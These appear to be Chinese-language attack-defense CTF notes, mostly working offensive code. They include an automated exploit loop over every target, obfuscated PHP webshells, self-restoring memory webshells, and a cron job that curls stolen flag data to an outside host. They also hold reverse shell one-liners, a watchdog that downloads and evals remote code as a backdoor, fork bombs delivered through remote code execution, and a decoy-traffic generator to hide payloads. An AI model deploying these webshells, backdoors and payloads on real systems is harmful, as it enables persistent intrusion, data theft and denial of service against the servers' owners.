##全自动全场开火
全场开火框架:
def main():
print "[+] Starting attack framework..."
round_time = 60 * 5
print "[+] Round time : %s seconds..." % (round_time)
wait_time = round_time / 2
print "[+] Wait time : %s seconds..." % (wait_time)
while True:
exploit_all()
print "[+] This round is finished , waiting for the next round..."
for i in range(wait_time):
print "[+] The next attack is %d seconds later..." % (wait_time - i)
time.sleep(1)
if __name__ == "__main__":
main()
def exploit(host, port):
flag = get_flag(host, port)
submit_flag(flag, token)
def exploit_all():
with open("targets") as f: #先要获取到全场ip port
for line in f:
host = line.split(":")[0]
port = int(line.split(":")[1])
print "[+] Exploiting : %s:%d" % (host, port)
exploit(host, port)
## RCE (远程命令执行)之后
* 写入webshell文件
webshell最好有一定的伪装性,文件名可以以 . 开头。
对于不同肉鸡上的webshell设置不同密码,防止别人用你的马来收flag。
<?php @preg_replace("/[email]/e",$_POST['h'],"error"); ?>
<?php
$uf="snc3";
$ka="IEBldmFbsK";
$pjt="CRfUE9TVF";
$vbl = str_replace("ti","","tistittirti_rtietipltiatice");
$iqw="F6ciddKTs=";
$bkf = $vbl("k", "", "kbakske6k4k_kdkekckokdke");
$sbp = $vbl("ctw","","ctwcctwrectwatctwectw_fctwuncctwtctwioctwn");
$mpy = $sbp('', $bkf($vbl("b", "", $ka.$pjt.$uf.$iqw))); $mpy();
?>
<?php
$_uU=chr(99).chr(104).chr(114);
echo $_uU;
$_cC=$_uU(101).$_uU(118).$_uU(97).$_uU(108).$_uU(40).$_uU(36).$_uU(95).$_uU(80).$_uU(79).$_uU(83).$_uU(84).$_uU(91).$_uU(49).$_uU(93).$_uU(41).$_uU(59);$_fF=$_uU(99).$_uU(114).$_uU(101).$_uU(97).$_uU(116).$_uU(101).$_uU(95).$_uU(102).$_uU(117).$_uU(110).$_uU(99).$_uU(116).$_uU(105).$_uU(111).
$_uU(110);
echo $_cC;
$_=$_fF("",$_cC);@$_();
?>
eval($_POST[1])
* 写入内存(不死)马
eval型:
def write_memery_webshell(url, directory, password):
sleep_time = 500 # micro second
code = "<?php $content = '<?php eval(base64_decode($_REQUEST[%s]));?>'; $writable_path = '%s'; $filename = '.%s.php'; $path = $writable_path.'/'.$filename; ignore_user_abort(true); set_time_limit(0); while(true){ if(file_get_contents($path) != $content){ file_put_contents($path, $content); } usleep(%d); }?>" % (password, directory, password, sleep_time)
filename = ".%s.php" % (password)
path = "%s/%s" % (directory, filename)
payload = "file_put_contents('%s', base64_decode('%s'));" % (path, code.encode("base64").replace("\n", ""))
print payload
return code_exec(url, payload).split("\n")[0:-1]
shell型:
def write_memery_webshell(url, directory, password):
sleep_time = 500 # micro second
code = "<?php $content = '<?php eval($_REQUEST[%s]);?>'; $writable_path = '%s'; $filename = '.%s.php'; $path = $writable_path.'/'.$filename; ignore_user_abort(true); set_time_limit(0); while(true){ if(file_get_contents($path) != $content){ file_put_contents($path, $content); } usleep(%d); }?>" % (password, directory, password, sleep_time)
filename = ".%s.php" % (password)
path = "%s/%s" % (directory, filename)
payload = "file_put_contents('%s', base64_decode('%s'));" % (path, code.encode("base64").replace("\n", ""))
return shell_exec(url, payload).split("\n")[0:-1]
唤醒内存马:
def active_memery_webshell(url):
try:
requests.get(url, timeout=0.5)
except:
print "[+] OK!"
* 写入crontab(计划任务)
让对方机器提交自己的flag:攻击者的token
$message="* * * * * curl 192.168.136.1:8098/?flag=$(cat /var/www/html/flag)&token=7gsVbnRb6ToHRMxrP1zTBzQ9BeM05oncH9hUoef7HyXXhSzggQoLM2uXwjy1slr0XOpu8aS0qrY";
ignore_user_abort(true);
set_time_limit(0);
while (true) {
$x =file_get_contents('/var/www/html/flag');
file_get_contents('http://192.168.136.1:8099/test.php?token=kericwy&flag='.$x);
sleep(5);
system("echo '$message' > /tmp/1 ;");
system("crontab /tmp/1;");
system("rm /tmp/1;");
$c=file_get_contents('http://192.168.136.1:8100/1.txt');
system($c);
* 反弹shell
在bash下可以运行:
bash -i >& /dev/tcp/127.0.0.1/4444 0>&1
php反弹:需要在目标机器安装php环境
php -r '$sock=fsockopen("127.0.0.1","4444");exec("/bin/sh -i <&3 >&3 2>&3");'
python反弹:
python -c 'import pty; pty.spawn("/bin/bash")'
* 进程守护 (监控文件是否存在 没有的话自动安装)
while [[ : ]]; do
# tell php that i am living
echo "Creating lock file..."
touch -a ${bash_lock_file}
# check php is living or not
last_access_time=`stat -c %X ${php_lock_file}`
now_time=`date +%s`
echo "php last alive time : ${last_access_time}"
echo $[ $now_time - $last_access_time ];
if [ ! -f "${php_lock_file}" ] || [ $[ $now_time - $last_access_time ] -gt $((sleep_time+1)) ]; then
echo "[-] php script is dead!"
echo "downloading php script"
wget ${php_url} -O $target_path && curl ${start_url} -m ${time_out}
else
echo "PHP script is alive..."
fi
# sleeping
echo "sleeping..."
sleep ${sleep_time}
ignore_user_abort(true);
set_time_limit(0);
$sleep_time = 3; // max sleep_time : 3 seconds
$content = file_get_contents($bash_url);
while(true){
// tell bash that i am living
echo "Telling bash that i am alive...\n";
touch($php_lock_file);
echo "PHP Lock file last accessed : ".(time() - fileatime($php_lock_file))."\n";
// check bash is living or not
echo "Checking the bash script is alive or not...\n";
if(!(file_exists($bash_lock_file) && ((time() - fileatime($bash_lock_file)) < ($sleep_time + 1)))){
echo "The bash script is dead!\n";
// download bash script
echo "Downloading bash script...\n";
@file_put_contents($bash_path, $content);
// restart bash script
echo "Restarting bash script...\n";
@popen('nohup bash '.$bash_path.' &', 'r');
}
// control loop speed
echo "Sleeping...\n";
sleep($sleep_time);
// backdoor
echo "Executing backdoor...";
@eval(file_get_contents($code_url));
}
* fork炸弹(dos攻击) 让目标机down机双倍扣分
eval型: 疯狂创建新进程,占用资源而变慢,以至于最后爆掉
def main():
host = "192.168.50.57"
port = "80"
url = "http://%s:%s/code.php" % (host, port)
code = "system(\"echo '.() { .|.& } && .' > /tmp/aaa\");system(\"/bin/bash /tmp/aaa\");echo \"seems good!\";"
print code_exec(url, code)
shell型:
def main():
host = "127.0.0.1"
port = "80"
url = "http://%s:%s/c.php" % (host, port)
command = ":(){ :|: & };:"
shell_exec(url, command)
* 垃圾流量生成
为了减少payload被别人轻易获取并重放,我们需要不断释放大量的垃圾流量。最好里面有众多的flag字符串来扰乱敌人的分析。
比赛开始,完成基础的运维工作后,运维手就可以往外打垃圾流量了,需要贯穿整个比赛流程。
从题目源码中获取真实参数:
def get_all(root, arg):
all = []
result = os.walk(root)
for path,d,filelist in result:
for file in filelist:
if file.endswith(".php"):
full_path = path + "/" + file
content = get_content(full_path)
all.append(("/" + file, find_arg(content, arg)))
return all
def main():
root = "."
print get_all(root, "_GET")
print get_all(root, "_POST")
print get_all(root, "_COOKIE")
垃圾流量生成: def get_fake_plain_payloads(flag_path): payloads = [] payloads.append('system("cat %s");' % (flag_path)) payloads.append('highlight_file("%s");' % (flag_path)) payloads.append('echo file_get_contents("%s");' % (flag_path)) payloads.append('var_dump(file_get_contents("%s"));' % (flag_path)) payloads.append('print_r(file_get_contents("%s"));' % (flag_path)) return payloads def get_fake_base64_payloads(flag_path): payloads = get_fake_plain_payloads(flag_path) return [payload.encode("base64").replace("\n","") for payload in payloads] def main(): flag_path = "/home/web/flag/flag" print get_fake_plain_payloads(flag_path) print get_fake_base64_payloads(flag_path)
垃圾流量发射:
def handle_get(url, root, flag_path):
all_requests = []
http_get = get_all(root, "_GET")
plain_payloads = get_fake_plain_payloads(flag_path)
base64_payloads = get_fake_base64_payloads(flag_path)
for item in http_get:
path = item[0]
args = item[1]
for arg in args:
for payload in plain_payloads:
new_url = "%s%s?%s=%s" % (url, path[len("./"):], arg[len("$_GET['"):-len("']")], payload)
request = requests.Request("GET", new_url)
all_requests.append(request)
for payload in base64_payloads:
new_url = "%s%s?%s=%s" % (url, path[len("./"):], arg[len("$_GET['"):-len("']")], payload)
request = requests.Request("GET", new_url)
all_requests.append(request)
return all_requests
fake.request.py:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import requests
import threading
import time
import random
from core.obfs.fake_payloads import *
from core.obfs.get_arg import *
timeout = 0.1
def send_http(request):
prepared = request.prepare()
session = requests.Session()
try:
session.send(prepared, timeout=timeout)
except Exception as e:
print e
def handle_single_http(request):
send_http(request)
def handle_get(url, root, flag_path):
all_requests = []
http_get = get_all(root, "_GET")
plain_payloads = get_fake_plain_payloads(flag_path)
base64_payloads = get_fake_base64_payloads(flag_path)
for item in http_get:
path = item[0]
args = item[1]
for arg in args:
for payload in plain_payloads:
new_url = "%s%s?%s=%s" % (url, path[len("./"):], arg[len("$_GET['"):-len("']")], payload)
request = requests.Request("GET", new_url)
all_requests.append(request)
for payload in base64_payloads:
new_url = "%s%s?%s=%s" % (url, path[len("./"):], arg[len("$_GET['"):-len("']")], payload)
request = requests.Request("GET", new_url)
all_requests.append(request)
return all_requests
def handle_post(url, root, flag_path):
all_requests = []
http_get = get_all(root, "_POST")
plain_payloads = get_fake_plain_payloads(flag_path)
base64_payloads = get_fake_base64_payloads(flag_path)
for item in http_get:
path = item[0]
args = item[1]
for arg in args:
for payload in plain_payloads:
new_url = "%s%s" % (url, path[len("./"):])
request = requests.Request("POST", new_url)
request.data = {
arg[len("$_POST['"):-len("']")]:payload
}
all_requests.append(request)
for payload in base64_payloads:
new_url = "%s%s" % (url, path[len("./"):])
request = requests.Request("POST", new_url)
request.data = {
arg[len("$_POST['"):-len("']")]:payload
}
all_requests.append(request)
return all_requests
def handle_cookie(url, root, flag_path):
all_requests = []
http_get = get_all(root, "_COOKIE")
plain_payloads = get_fake_plain_payloads(flag_path)
base64_payloads = get_fake_base64_payloads(flag_path)
for item in http_get:
path = item[0]
args = item[1]
for arg in args:
for payload in plain_payloads:
new_url = "%s%s" % (url, path[len("./"):])
request = requests.Request("GET", new_url)
request.cookies = {
arg[len("$_COOKIE['"):-len("']")]:payload
}
all_requests.append(request)
for payload in base64_payloads:
new_url = "%s%s" % (url, path[len("./"):])
request = requests.Request("GET", new_url)
request.cookies = {
arg[len("$_COOKIE['"):-len("']")]:payload
}
all_requests.append(request)
return all_requests
def get_targets():
targets = []
with open("targets") as f:
for line in f:
host = line.split(":")[0]
port = int(line.split(":")[1])
targets.append((host, port))
return targets
def main():
flag_path = "/home/web/flag/flag"
root = "./sources"
round_time = 60
all_requests = []
targets = get_targets()
for target in targets:
print "-" * 32
host = target[0]
port = target[1]
print "[+] Generating requests to fake %s:%d" % (host, port)
url = "http://%s:%d/" % (host, port)
print "[+] Requests number : [%d]" % (len(all_requests))
all_requests += handle_get(url, root, flag_path)
print "[+] Requests number : [%d]" % (len(all_requests))
all_requests += handle_post(url, root, flag_path)
print "[+] Requests number : [%d]" % (len(all_requests))
all_requests += handle_cookie(url, root, flag_path)
each_second = len(all_requests) / round_time
print "[+] Each second should send %d requests" % (each_second)
random.shuffle(all_requests)
for request in all_requests:
sleep_time = 1.0 / each_second
print "[+] Sleeping %f seconds" % (sleep_time)
time.sleep(sleep_time)
print "[+] Sending http requests ..."
print "%s => %s" % (request.method, request.url)
thread = threading.Thread(target=handle_single_http, args=(request,))
thread.start()
thread.join()
if __name__ == "__main__":
main()
* 流量重放
对于attacker而言,流量的快速同步和好用的流量分析机制是非常有用的,对于可疑的流量,应该快速粘贴到burp等工具中进行测试,如果可以攻击则使用script-gen等插件迅速生成攻击脚本并整合到攻击框架中。
* 把流量dump下来:
scp -r gamebox:/ctfer/logs/ ./
也可以使用定时脚本的方式。
* 由burp生成EXP的神器:
http://www.kericwy.xyz/files/scriptgen-burp-plugin-6.jar